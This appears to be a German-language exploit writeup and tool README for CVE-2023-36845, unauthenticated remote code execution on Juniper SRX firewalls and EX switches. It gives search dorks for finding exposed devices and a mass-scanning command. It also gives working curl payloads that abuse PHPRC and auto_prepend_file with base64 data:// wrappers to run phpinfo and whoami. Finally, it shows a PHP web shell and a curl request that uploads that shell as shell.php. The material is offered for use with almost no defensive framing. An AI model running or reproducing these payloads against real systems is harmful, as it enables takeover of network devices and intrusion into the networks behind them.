
Exploit für CVE-2023-36845, der nicht authentifizierte Remote-Codeausführung auf Juniper SRX Firewalls und EX Switches ermöglicht, mittels Manipulation von PHP-Umgebungsvariablen, mit Fähigkeiten zur Erkennung und Zustellung von Payloads.
CVE-2023-36845 stellt eine bemerkenswerte Schwachstelle in der Manipulation von PHP-Umgebungsvariablen dar, die Juniper SRX Firewalls und EX Switches betrifft. Obwohl Juniper diese Schwachstelle als mittelschwer eingestuft hat, werden wir in diesem Artikel erläutern, wie diese einzelne Schwachstelle für entfernte, nicht authentifizierte Codeausführung genutzt werden kann.
title:"Juniper Web Device Manager"
title:"Juniper" http.favicon.hash:2141724739
Erkennung
python3 CVE-2023-36845.py -f targets.txt -o output.txt
Die Verwendung eines beliebigen Protokoll-Wrappers in Verbindung mit auto_prepend_file ist möglich. Die geeignetste Wahl für diesen Vorgang ist das data://-Protokoll, das die Bereitstellung der „Sekundärdatei“ inline ermöglicht. Hier ist eine anspruchsvolle Darstellung dieses Exploits, der das eingebettete <? phpinfo(); ?> innerhalb des data://-Schemas ausführt:
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'
Führen Sie den Befehl whoami aus
<?php shell_exec('whoami'); ?>
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD9waHAgc2hlbGxfZXhlYygnd2hvYW1pJyk7ID8+Cg=="'
Eine Datei hochladen
<?php if(isset($_REQUEST[cmd])){ echo "<pre>"; $cmd = ($_REQUEST[cmd]); system($cmd); echo "</pre>"; die; }?>
$ curl http://target.tld/webauth_operation.php -d 'rs=do_upload&rsargs[]=[{"fileName": "shell.php", "fileData": ",PD9waHAgaWYoaXNzZXQoJF9SRVFVRVNUW2NtZF0pKXsgZWNobyAiPHByZT4iOyAkY21kID0gKCRfUkVRVUVTVFtjbWRdKTsgc3lzdGVtKCRjbWQpOyBlY2hvICI8L3ByZT4iOyBkaWU7IH0/Pgo=
", "csize": 110}]'
| Parameter | Beschreibung | Typ |
|---|---|---|
| --file / -f | Eingabedatei mit Zielen | Datei |
| -o | Ausgabedatei | Datei |